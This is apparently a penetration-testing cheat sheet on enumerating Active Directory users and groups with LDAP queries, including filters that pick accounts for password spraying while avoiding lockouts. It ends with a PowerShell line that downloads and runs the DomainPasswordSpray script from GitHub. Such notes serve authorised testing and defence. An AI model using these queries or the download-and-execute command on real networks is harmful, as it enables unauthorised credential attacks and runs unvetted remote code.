Enumerate Users & Groups

ADExplorer

Perform recon from a computer outside the domain using credentials of a standard user. See the SysInternals page for details.

adsisearcher

Allows to perform all kind of standard LDAP query to the Active Directory database.

Enumerate Users
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*))").FindAll().Properties.samaccountname

Combine this base query with other useful LDAP filters to fine-tune your search:

Filter Description
userAccountControl:1.2.840.113556.1.4.803:=2 Disabled account
!(userAccountControl:1.2.840.113556.1.4.803:=2) Enabled account
userAccountControl:1.2.840.113556.1.4.803:=65536 Password never expire
badpwdcount<=[LOCKOUT TRESHOLD - 2] At least 1 failed attempt left (get lockout threshold)
admincount=1 Objects protected by AdminSDHolder (kesako?)
memberof=CN=Domain Admins,CN=Users,DC=domain,DC=example,DC=org Member of Domain Admins

Example for password spray:

([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(badpwdcount<=1)(userAccountControl:1.2.840.113556.1.4.803:=65536)))").FindAll().Properties.samaccountname

Reference: https://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx

Enumerate Groups
([adsisearcher]"(&(objectClass=group)(samaccountname=*))").FindAll().Properties | % { Write-Host $_.samaccountname : $_.description }

DomainPasswordSpray.ps1

Get-DomainUserList -RemoveDisabled -RemovePotentialLockouts

Note

IEX (New-Object System.Net.WebClient).DownloadString(‘https://github.com/dafthack/DomainPasswordSpray/raw/master/DomainPasswordSpray.ps1')

Reference: https://github.com/dafthack/DomainPasswordSpray#get-domainuserlist-module